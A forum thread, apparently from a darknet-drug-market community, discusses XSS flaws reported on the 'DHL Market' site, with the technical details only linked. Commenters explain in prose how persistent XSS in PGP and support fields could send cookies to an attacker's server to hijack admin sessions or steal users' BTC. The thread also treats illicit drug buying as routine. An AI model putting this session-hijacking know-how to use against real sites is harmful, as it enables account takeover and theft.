DHL Market Security Vulnerabilities

Took a look at DHL Market. Some rather obvious bugs in their website. Details here:

https://gist.github.com/anonymous/f38115e9e8318fda2f89961503f31777

Hilarity when I report the bug to support and it triggered another XSS vuln there.

Some of their req parameters seem very iffy and it wouldn't surprise me to find a lot more there - but I don't have time to dig deep at the moment (and would have to break out the captcha solver)


Comments


[43 Points] Clix828:

Word, Thank you /u/t0mcheck you are a highly valued assest to this community.
I hope you are being compensated for the bug bounty.


[19 Points] datadotzip:

For anyone not technically inclined. These are -very- easy (and very dangerous) vulnerabilities to exploit. This is web security 101. Law enforcement will have known about this for a while now. Especially the persistant XSS in PGP/support is dangerous. It is bad because this would allow a 'call home' (via JS) to a server that (forexample) OP controls containing the cookie data of the support person (potentially an administrator privledge account). This would allow him to sign in while that session is valid, effectively hijacking the market.

The PGP one is bad, because if you visit that vendors profile, the same attack could happen to your session, and they could siphon off your BTC balance.

Stay woke boys. Remember, that slider should be waaaay the fuck up to high.


[15 Points] JburnaDNM:

Our where art thou? Agora? The days when gentlemen could buy drugs without bugs.


[7 Points] None:

Hold on if a vendor uses js/xss in their pgp on public profile will it execute? That is super hilarious. Did they even try? Also dangerous


[6 Points] PM_UR_DNM_TAKEDOWNS:

These are critical vulnerabilities.

LE could send a bunch of people a DHL link that has an xss to js 0day or beef script.

Always have js disabled.


[4 Points] AI-Bourne:

have you tried RegEx vectors, I bet most websites will fail a RegEx attack.


[5 Points] DHL-3:

This only works in theory with javascript enabled which is a big NO-NO around here. Also this old news and we commented on this 2 years ago already. There are also forum threads about it.

I challenge you to change these facts:

No stolen funds in 2+ years. No hacked users or vendors in 2+ years. Maybe 10 or less phished users in 2+ years. Change a line of code on our server. Good luck! Find out our IP(s). Good luck!.

This is FUD. And for FUD we don't pay bounties. Get serious or get a job bro.

EDIT: Admin told me to add this: You really took the time to upload a nice description in form of a gist which is very refreshing. We applaud that. You seem to the serious in spite of lots of other timewasters we are dealing with. Please PM SeriousSam for a token of appreciation. Thanks.


[2 Points] undercover_anarchist:

Is it true that /u/t0mchecks bug was already described in the forums previously? Yes. But whether you pay him for finding the bug or not is your choice, there is however a more important aspect to this.

/u/t0mcheck s bug is still as valid now as it was 2 years ago. It has potential to cause serious damage, perhaps not a full size hack, but damage nonetheless.

DHL claims that this shouldn't be of concern because we should have no-script on always. That doesn't absolve them of the problem. Most people don't know very much about any of this underlying technology, and some people forget. Of course their errors are their own fault, not caring for other people is simply mean.

The next point is, if you've known this bug for 2 years why haven't you fixed it? What the fuck. 2 whole fucking years and all you did was brush it under the carpet as "trivial"? It shouldn't be difficult to fix if you know. If you don't, maybe do some more research and re-open the site in a year. A good market will always make money.

This is EXACTLY the kind of mentality that gets markets hacked or seized. Granted this problem doesn't appear to have caused much damage, this mentality of bushing shit under the rug and leaving markets with bugs is what has caused the demise of others. I don't even get what the fuss is about, just fucking fix it. Since when the fuck do we have to start telling markets to fix their own bugs? You should be fixing your own goddamn bugs if you know about them, I can at least understand ones you don't know about. It's fucking amazing that a market intentionally doesn't fix their own bugs. These market admins are turning into kindergartners!


[3 Points] None:

/u/DHL-1 /u/DHL-2


[4 Points] datadotzip:

I love how /u/DHL-3's defense is "oh we've known about this for long'. lmao let's assume thats true, how does that improve the situation at all.


[3 Points] Atrophried:

Cheers for this, if anything it allows people like me to see how market staff respond to security vulnerabilities (the comments are mind-blowing).

With the recent incidents regarding AB and Hansa, if he/she thinks that being proud of taking a risk gets them customers they must be proper thick.


[2 Points] kyousaya4life:

The persistent in the PGP key is just disturbing, when I was fucking around with PHP in 9th grade I at least knew to use its htmlents() (or whatever that function is called) on user inputs. Whoever made this is in no way, shape, or form qualified to run a market, run away like your life depends on it, because it probably does.


[1 Points] None:

[deleted]


[1 Points] pooperpantsdnm:

Wow this dont look good at all. too bad I cant even get onto that market anyway bahahaha


[3 Points] None:

[deleted]


[1 Points] ItsAllJustPretend:

OP, which of the current markets have you looked at and looked safe to you?

It's great you're finding the flaws in the 2 markets you posted about, but if you haven't looked at say, TR, Wallstreet, Dream, and they have even bigger glaring security flaws, then it would only hurt the DNM users more to flood onto those. Having some assurance of the safety of certain markets (i.e. has been vetted) would be really helpful.


[1 Points] _Dreadz:

looks like its time to fire up PARROT OS and have a look around.. any pointers where to embark big homie??


[1 Points] b1ack-spyd3r:

You reported these bugs to the market admins and gave them time to go offline/fix before you posted publicly right? Then if they don't, not your problem, post publicly. Not assuming, just asking. I mean these are brutal and very simple vulns that shouldn't be there but I'd hate to think buyers are gonna be in deep water cause of this. more or less past buyers rather then future.

But koodos and thanks for doing some work for the community. One of these days I'll start probing them.

Baffles me that these markets aren't probing their own pages.


[1 Points] mydnthrowaway:

Have you examined trade route and cgmc?


[-2 Points] elfer90:

another one bites the dust